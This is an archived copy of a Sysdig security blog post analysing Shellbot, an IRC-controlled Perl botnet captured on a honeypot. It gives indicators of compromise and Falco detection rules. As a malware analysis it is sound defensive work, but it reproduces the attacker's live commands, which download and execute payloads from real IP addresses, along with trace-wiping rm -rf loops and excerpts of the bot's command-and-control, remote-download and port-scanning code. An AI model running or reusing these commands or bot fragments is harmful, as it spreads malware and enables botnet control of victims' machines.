{
	"id": "7d1956a2-b694-4ffb-bf76-b820c59b3731",
	"created_at": "2026-04-06T00:06:07.964372Z",
	"updated_at": "2026-04-10T03:21:36.925559Z",
	"deleted_at": null,
	"sha1_hash": "65c74e7fd2079f100dd86a79c2768fee3270fcf6",
	"title": "Malware analysis: Hands-On Shellbot malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2234365,
	"plain_text": "Malware analysis: Hands-On Shellbot malware\r\nBy Alberto Pellitteri\r\nPublished: 2021-11-02 · Archived: 2026-04-05 17:52:49 UTC\r\nhttps://sysdig.com/blog/malware-analysis-shellbot-sysdig/\r\nPage 1 of 15\n\nMalware analysis is a fundamental factor in improving the incident detection and resolution systems of any company. The Sysdig Security Research team covers how this Shellbot malware works and how to detect it.\r\nShellbot malware is still widespread. We recorded numerous incidents despite this being a relatively old and known attack that is also available in open GitHub repositories.\r\nWhen the malware is successfully deployed on a targeted system, it may be used for different purposes according to the instructions received from its related IRC server, such as:\r\nDownloading several files for persistence.\r\nRunning a port scan to discover the entire network.\r\nPerforming data exfiltration.\r\nParticipating in a distributed denial of service (DDoS).\r\nWhat is Shellbot malware?\r\nShellbot malware enables the attackers to communicate with the C\u0026C server in order to run commands within the victim machine.\r\n
The C\u0026C server, also called the IRC server in this scenario, can directly send messages to its victims' machines, both to keep the communication channel alive and to specify what commands they have to run.\r\nIts peculiarity is that the victim machine downloads and launches multiple binaries after the first execution. Many of them have the same purpose but are built for different OSes (32/64-bit) and CPUs (ARM, MIPS).\r\nTo analyze the malware, we used our honeypot with misconfigured services to see real traces of the different binaries.\r\nLet's begin with a quick overview of Shellbot malware behavior:\r\n1. The entry point of this Shellbot malware was a misconfigured Tomcat application, with default credentials for its management dashboard.\r\n2. The first command downloaded the initd script that set the stage for the Shellbot malware.\r\n3. Once executed, this first script:\r\n   1. Downloaded several binaries and scripts.\r\n   2. Erased the traces of the new downloads to prevent their detection.\r\n4. The ulimit.sh script tried to increase the user process resource limits.\r\n5. The bash.sh script, instead, loops continuously, checking the open sockets for specific process IDs (PIDs) to kill.\r\n6. Finally, other binaries were downloaded as Perl scripts or ELF files, built to make the malware runnable on different platforms.\r\n
These are the actual Shellbot malware: they force the victim to communicate with the IRC server, executing whatever it wants.\r\nIn our malware analysis, we observed that the victim container was exploited to cause a DoS against some remote domains, flooding them with thousands of packets.\r\nLet's dig deeper into the details of this Shellbot malware to see exactly how it works, and understand the malicious behavior to learn how to detect it with open source Falco.\r\nShellbot malware in depth\r\n#1 Initial Access – Hacked Tomcat and the initd script\r\nThe attacker gained access to the Tomcat container by brute forcing its default credentials and spawning a reverse shell. It ran the following command in order to download the first bash script:\r\nThis script first removed its traces, in case it had already existed in the container, and then downloaded these other files to be executed:\r\ncd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistax64; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistax64; cat mizakotropistax64 \u003ex0000x;chmod +x *;nice -20 ./x0000x dedicated\r\ncd /tmp; wget http://192.99.43.212/craton.pl -O /tmp/craton.pl; curl http://192.99.43.212/craton.pl -o /tmp/craton.pl; chmod 777 /tmp/craton.pl; perl /tmp/craton.pl; rm -rf /tmp/craton.pl; rm -rf /tmp/craton.pl.*\r\ncd /tmp; wget http://192.99.43.212/bash.sh; curl http://192.99.43.212/bash.sh -o bash.sh; chmod 777 bash.sh; nohup bash bash.sh \u0026\r\ncd /tmp; wget http://192.99.43.212/ulimit.sh; curl http://192.99.43.212/ulimit.sh -o ulimit.sh; chmod 777 ulimit.sh; bash ulimit.sh; rm -rf ulimit.sh\r\ncd /tmp; wget http://144.217.249.55/bot.pl -O /tmp/bot.pl --quiet; curl -s http://144.217.249.55/bot.pl -o /tmp/bot.pl; perl /tmp/bot.pl; rm -rf /tmp/bot.pl; rm -rf /tmp/bot.pl.1\r\nmkdir /tmp/.logs/\r\ncd /tmp; wget http://144.217.249.55/apachelogd -O /tmp/.logs/apachelogd; curl http://144.217.249.55/apachelogd -o /tmp/.logs/apachelogd; chmod +x /tmp/.logs/apachelogd; rm -rf /tmp/.logs/apachelogd.*\r\nIt modified the shell configuration file so that the files are downloaded again when the user opens a new terminal.\r\nIn the end, the malware removed all files, the history, and whatever it had fetched from the IRC server.\r\n...\r\nrm -rf /var/tmp/bot.pl\r\nrm -rf /tmp/bot.pl\r\nrm -rf bot.pl\r\nrm -rf bot.pl.1\r\nrm -rf /tmp/bot.pl.1\r\nrm -rf /var/tmp/bot.pl.1\r\nrm -rf /var/tmp/meca.pl\r\nrm -rf /var/tmp/meca2.pl\r\nrm -rf /tmp/meca2.pl\r\nrm -rf /tmp/meca.pl\r\nrm -rf /tmp/mizakotropista*\r\nrm -rf /tmp/x0000x*\r\nrm -rf /tmp/*.sh\r\nrm -rf /tmp/*.pl.*\r\n...\r\n#2 Malware capabilities limitless – ulimit.sh script\r\nThe ulimit.sh script initially checked the $EUID variable to see whether the attacker had root permissions. If so, it ran the ulimit command, which sets resource limits such as the maximum number of user processes ( -u ), the maximum scheduling priority ( -e ), and so on.\r\n...\r\nulimit -u unlimited\r\nulimit -s unlimited\r\nulimit -q unlimited\r\nulimit -n 999999\r\nulimit -l unlimited\r\nulimit -i unlimited\r\nulimit -c unlimited\r\nulimit -e unlimited\r\nulimit -r unlimited\r\n...\r\n#3 Stealth malware activities – bash.sh script\r\nThe bash.sh script looped endlessly to remove any evidence that this attack had ever existed, as the initd script did too.\r\nIn fact, it printed out all sockets with their process name and process ID, searching for specific ones to be killed with the kill -9 command. Then, it removed some evidence, slept one second, and looped again.\r\nwhile true\r\ndo\r\nnetstat -anp | grep '666' | awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nnetstat -anp | grep '107.172' | awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nrm -rf /tmp/*.arm\r\nrm -rf /tmp/*.arm5n\r\nrm -rf /tmp/*.arm7\r\nrm -rf /tmp/*.m68k\r\nrm -rf /tmp/*.mips\r\nrm -rf /tmp/*.mpsl\r\nrm -rf /tmp/*.ppc\r\nrm -rf /tmp/*.sh4\r\n...\r\n#4 The Shellbot core: bot.pl and craton.pl\r\nTo run the malware analysis on our pod, the initd script initially downloaded binaries, like mizakotropistax86, and some Perl scripts. The real purpose of these binaries is the same, so we are going to take a look at the Perl ones.\r\nbot.pl and craton.pl are two identical scripts used to communicate with different IRC servers via different ports. This Perl script is also available on GitHub and could be modified by the attackers to customize the malware behavior and what the IRC server wants to do, as well as to bypass typical blacklist-based malware detection methods.\r\nLet's take a look at this script.\r\nStatic code analysis for the Perl scripts\r\nInitially, the IRC server IP and its port are defined:\r\nmy $servidor='192.99.43.212' unless $servidor;\r\nmy $porta='2894';\r\nmy @canais=(\"#spoof\");\r\nmy @adms=(\"r00x\");\r\nThe script also specifies how to handle some signals, assigning a value to the corresponding key of the %SIG hash. In this case, using the 'IGNORE' value, the process ignores the following signals:\r\n$SIG{'INT'} = 'IGNORE';\r\n$SIG{'HUP'} = 'IGNORE';\r\n$SIG{'TERM'} = 'IGNORE';\r\n$SIG{'CHLD'} = 'IGNORE';\r\n$SIG{'PS'} = 'IGNORE';\r\nMoreover, the script initially declares the usage of the IO::Socket interface, which provides an object-oriented way to create and handle sockets.\r\n
With this interface, it first sets up the socket and then runs the can_read() method in order to receive an array of handles ready for reading.\r\n…\r\nmy @ready = $sel_cliente-\u003ecan_read(0.6);\r\nnext unless(@ready);\r\nforeach $fh (@ready) {\r\n  $IRC_cur_socket = $fh;\r\n  $meunick = $irc_servers{$IRC_cur_socket}{'nick'};\r\n  $nread = sysread($fh, $msg, 4096);\r\n  if ($nread == 0) {\r\n    $sel_cliente-\u003eremove($fh);\r\n    $fh-\u003eclose;\r\n    delete($irc_servers{$fh});\r\n  }\r\n  @lines = split (/\\n/, $msg);\r\n  for(my $c=0; $c\u003c= $#lines; $c++) {\r\n    $line = $lines[$c];\r\n    $line=$line_temp.$line if ($line_temp);\r\n    $line_temp='';\r\n    $line =~ s/\\r$//;\r\n    unless ($c == $#lines) {\r\n      parse(\"$line\");\r\n    } else {\r\n      if ($#lines == 0) {\r\n        parse(\"$line\");\r\n      } elsif ($lines[$c] =~ /\\r$/) {\r\n        parse(\"$line\");\r\n      } elsif ($line =~ /^(\\S+) NOTICE AUTH :\\*\\*\\*/) {\r\n        parse(\"$line\");\r\n      } else {\r\n        $line_temp = $line;\r\n      }\r\n    }\r\n  }\r\n}\r\n...\r\nFor each handle obtained, the script reads up to 4096 bytes from the socket, stores them in the $msg variable, and splits the message on the newline character into separate lines.\r\nOnce these lines have been separated, the script calls the parse() subroutine on each one to match specific regular expressions that force the bot, and therefore the victim system, to do whatever the IRC server wants.\r\nHere are some patterns that can be parsed inside each line received from the IRC server, each of which encodes a specific action to be run on the target system.\r\nHere is the PING-PONG exchange that is used to keep the communication channel alive between the bot and the IRC server.\r\n
An example of how this exchange appears, analyzing the capture with Sysdig Inspect, follows.\r\nif ($servarg =~ /^PING :(.*)/) {\r\n  sendraw(\"PONG :$1\");\r\n}\r\nThe IRC server can also request the download of specific resources onto the victim machine. In this case, the machine calls another function to fetch that specific resource, storing it in the file system.\r\nelsif ($funcarg =~ /^download\\s+(.*)\\s+(.*)/) {\r\n  getstore(\"$1\", \"$2\");\r\n  sendraw($IRC_cur_socket, \"PRIVMSG $printl :Download de $2 ($1) Concluido!\") if($estatisticas);\r\n}\r\nIt can also ask to perform a port scan, which contacts some specific ports of the target IP, or a full port scan over a range of ports. The information collected about the open ports is sent back to the IRC server.\r\nif ($funcarg =~ /^portscan (.*)/) {\r\n  my $hostip=\"$1\";\r\n  my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");\r\n  my (@aberta, %porta_banner);\r\n  foreach my $porta (@portas) {\r\n    my $scansock = IO::Socket::INET-\u003enew(PeerAddr =\u003e $hostip, PeerPort =\u003e $porta, Proto =\u003e 'tcp', Timeout =\u003e 4);\r\n    if ($scansock) {\r\n      push (@aberta, $porta);\r\n      $scansock-\u003eclose;\r\n    }\r\n  }\r\n  if (@aberta) {\r\n    sendraw($IRC_cur_socket, \"PRIVMSG $printl :Portas abertas: @aberta\");\r\n  } else {\r\n    sendraw($IRC_cur_socket,\"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.\");\r\n  }\r\n}\r\nelsif ($funcarg =~ /^fullportscan\\s+(.*)\\s+(\\d+)\\s+(\\d+)/) {\r\n  my $hostname=\"$1\";\r\n  my $portainicial = \"$2\";\r\n  my $portafinal = \"$3\";\r\n  my (@abertas, %porta_banner);\r\n  foreach my $porta ($portainicial..$portafinal) {\r\n    my $scansock = IO::Socket::INET-\u003enew(PeerAddr =\u003e $hostname, PeerPort =\u003e $porta, Proto =\u003e 'tcp', Timeout =\u003e 4);\r\n    if ($scansock) {\r\n      push (@abertas, $porta);\r\n      $scansock-\u003eclose;\r\n      if ($estatisticas) {\r\n        sendraw($IRC_cur_socket, \"PRIVMSG $printl :Porta $porta aberta em $hostname\");\r\n      }\r\n    }\r\n  }\r\n  if (@abertas) {\r\n    sendraw($IRC_cur_socket, \"PRIVMSG $printl :Portas abertas: @abertas\");\r\n  } else {\r\n    sendraw($IRC_cur_socket,\"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.\");\r\n  }\r\n}\r\nThe two sides can also send \"private messages\" in order to perform data exfiltration, exchange other information, or run more specific commands.\r\n#5 The flooding binary: apachelogd\r\nThis binary was downloaded at the beginning of the Shellbot infection by the initd bash script that we mentioned before.\r\nIt is quite interesting that the binary remains stealthy until a remote command is received from the IRC server. As a matter of fact, several hours after receiving the attack, we noticed this command execution:\r\nAfter that, our container started flooding the domain specified in the command line, always targeting the same destination port but continuously changing the client port.\r\nSummary of IOC and suspicious activities detected\r\nIPs \u0026 URLs\r\n192.99.43.212\r\n144.217.249.55\r\n141.95.19.123\r\nhttps://cadastramentoltau.com/\r\nFiles and their SHA256:\r\nInitd\r\n718db42305a8d5b4c3ff74a05037de2f5e679db24bf86b8e88ab34c490699ea3\r\nBash.sh\r\na5e010b0abf603facae5676c2c37f7063f6efc12bc7c863982bff133ec547a3f\r\nUlimit.sh\r\ndb5382c0ef1b204672b4168425d737380288653ac74360b39f1ec466a5a47eb9\r\nBot.pl\r\nd4bbe4087175d3981b2925b77c24baffd8e086c2f9df7179d142e00e7e2ec3ce\r\nCraton.pl\r\n7046260a23088b52debdeb701032db0352323ed26d9816daa4a53222b26ca720\r\nMizakotropistax86\r\n5d6f674a7abab5e60548531a69e6ecb23cc2e2fe823cd7f8ccac6928db5f757e\r\nApachelogd\r\n387099a6c011c0074b9a368a7d3818e3daab0b24527b65d589b583772f5e1c56\r\nSuspicious behavior\r\nA few suspicious activities worth mentioning in our malware analysis:\r\nwget or curl commands inside a container at runtime (not build time).\r\nWriting below the /tmp folder and giving execution permissions to new files at runtime may be a sign of future malware execution.\r\nFile removal and history deletion can indicate that something wants to hide its tracks.\r\nNetwork communication with the IRC server and anomalous outbound traffic over the internet.\r\nOnce we have identified these activities, we can see how to detect them.\r\nDetecting malware execution with Falco\r\nThe detection of this Shellbot malware and other generic ones can be done using Falco in order to spot suspicious connections or malicious binary downloads and executions.\r\nFalco is a CNCF open source project used to detect unexpected application behavior and send alerts at runtime. You can leverage its powerful and flexible rules language to match suspicious behaviors and generate event alerts. It comes with a predefined set of rules, but you can also customize them or create new ones that fit your needs.\r\nHere, you can see some useful custom rules.\r\n- rule: Unexpected outbound connection destination\r\n  desc: Detect any outbound connection to a destination outside of an allowed set of ips, networks, or domain names\r\n  condition: \u003e\r\n    consider_all_outbound_conns and outbound and not\r\n    ((fd.sip in (allowed_outbound_destination_ipaddrs)) or\r\n     (fd.snet in (allowed_outbound_destination_networks)) or\r\n     (fd.sip.name in (allowed_outbound_destination_domains)))\r\n  output: Disallowed outbound connection destination (command=%proc.cmdline connection=%fd.name user=%user.name user_loginuid=%user.loginuid container_id=%container.id image=%container.image.repository)\r\n  priority: NOTICE\r\n  tags: [network]\r\n- rule: Modify Shell Configuration File\r\n  desc: Detect attempt to modify shell configuration files\r\n  condition: \u003e\r\n    open_write and\r\n    (fd.filename in (shell_config_filenames) or\r\n     fd.name in (shell_config_files) or\r\n     fd.directory in (shell_config_directories))\r\n    and not proc.name in (shell_binaries)\r\n    and not exe_running_docker_save\r\n  output: \u003e\r\n    a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)\r\n  priority:\r\n    WARNING\r\n  tags: [file, mitre_persistence]\r\n- rule: Interpreted procs outbound network activity\r\n  desc: Any outbound network activity performed by any interpreted program (perl, python, ruby, etc.)\r\n  condition: \u003e\r\n    (outbound and consider_interpreted_outbound\r\n     and interpreted_procs)\r\n  output: \u003e\r\n    Interpreted program performed outgoing network connection\r\n    (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline connection=%fd.name container_id=%container.id image=%container.image.repository)\r\n  priority: NOTICE\r\n  tags: [network, mitre_exfiltration]\r\n- rule: Container Drift Detected (chmod)\r\n  desc: New executable created in a container due to chmod\r\n  condition: \u003e\r\n    chmod and\r\n    consider_all_chmods and\r\n    container and\r\n    not runc_writing_var_lib_docker and\r\n    not user_known_container_drift_activities and\r\n    evt.rawres\u003e=0 and\r\n    ((evt.arg.mode contains \"S_IXUSR\") or\r\n     (evt.arg.mode contains \"S_IXGRP\") or\r\n     (evt.arg.mode contains \"S_IXOTH\"))\r\n  exceptions:\r\n    - name: proc_name_image_suffix\r\n      fields: [proc.name, container.image.repository]\r\n      comps: [in, endswith]\r\n    - name: cmdline_file\r\n      fields: [proc.cmdline, fd.name]\r\n      comps: [in, in]\r\n      values:\r\n        - [[\"runc:[1:CHILD] init\"], [/exec.fifo]]\r\n  output: Drift detected (chmod), new executable created in a container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline filename=%evt.arg.filename name=%evt.arg.name mode=%evt.arg.mode event=%evt.type)\r\n  priority: ERROR\r\n- rule: Outbound Connection to C2 Servers\r\n  desc: Detect outbound connection to command \u0026 control servers\r\n  condition: outbound and fd.sip in (c2_server_ip_list)\r\n  exceptions:\r\n    - name: proc_proto_sport\r\n      fields: [proc.name, fd.l4proto, fd.sport]\r\n  output: Outbound connection to C2 server (command=%proc.cmdline connection=%fd.name user=%user.name user_loginuid=%user.loginuid container_id=%container.id image=%container.image.repository)\r\n  priority: WARNING\r\n  tags: [network]\r\nYou can check the full rule descriptions on GitHub.\r\nThese Falco rules can detect suspicious outbound and inbound traffic, with or without interpreted programs like perl. They can also spot other common behaviors that this Shellbot malware adopts, like giving execution permission to the downloaded files or modifying the shell configuration file.\r\nDetecting with Sysdig Secure\r\nThe Sysdig Secure DevOps Platform is built on top of Falco and can also be used to detect this attack.\r\n
For example, DevOps can:\r\nCreate a policy to detect any destination IPs or ports that are not in the white list.\r\nCreate a policy to detect any binaries and scripts launched that are not in the allow list (e.g., craton.pl, bot.pl, etc.).\r\nCreate a policy to detect any execution by interpreted programs, like Perl, if it is not expected.\r\nThe c2_server_ip_list can be filled with the malicious IPs that we found.\r\nMoreover, you can also prevent any of these behaviors by killing and restarting the involved systems when your Falco rules are triggered.\r\nConclusion\r\nThe Sysdig Security Research team dug deep into the Shellbot malware architecture and malicious activity to improve detection systems.\r\nWe covered a counter-trend malware that can compromise your system, giving the attacker the possibility to download new files, open connections, leverage your machine to launch DDoS attacks against a specific target, and so on.\r\nSo, system administrators must always adopt tools to detect suspicious behaviors and anomalous connections. That way, they can protect the integrity of their environment, and keep all services and software up to date to avoid becoming a zombie system.\r\nIf you would like to find out more about Falco:\r\nGet started at Falco.org.\r\nCheck out the Falco project on GitHub.\r\nGet involved with the Falco community.\r\nMeet the maintainers on the Falco Slack.\r\nFollow @falco_org on Twitter.\r\nAt Sysdig Secure, we extend Falco with out-of-the-box rules, along with other open source projects, making it even easier to work with and manage Kubernetes security. Register for our Free 30-day trial and see for yourself!\r\nThe Sysdig Secure DevOps Platform provides security to confidently run containers, Kubernetes, and cloud services.\r\n
With Sysdig, you can secure the build pipeline, detect and respond to runtime threats, continuously validate compliance, and monitor and troubleshoot cloud infrastructure and services. Try it today!\r\nSource: https://sysdig.com/blog/malware-analysis-shellbot-sysdig/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sysdig.com/blog/malware-analysis-shellbot-sysdig/"
	],
	"report_names": [
		"malware-analysis-shellbot-sysdig"
	],
	"threat_actors": [],
	"ts_created_at": 1775433967,
	"ts_updated_at": 1775791296,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/65c74e7fd2079f100dd86a79c2768fee3270fcf6.pdf",
		"text": "https://archive.orkl.eu/65c74e7fd2079f100dd86a79c2768fee3270fcf6.txt",
		"img": "https://archive.orkl.eu/65c74e7fd2079f100dd86a79c2768fee3270fcf6.jpg"
	}
}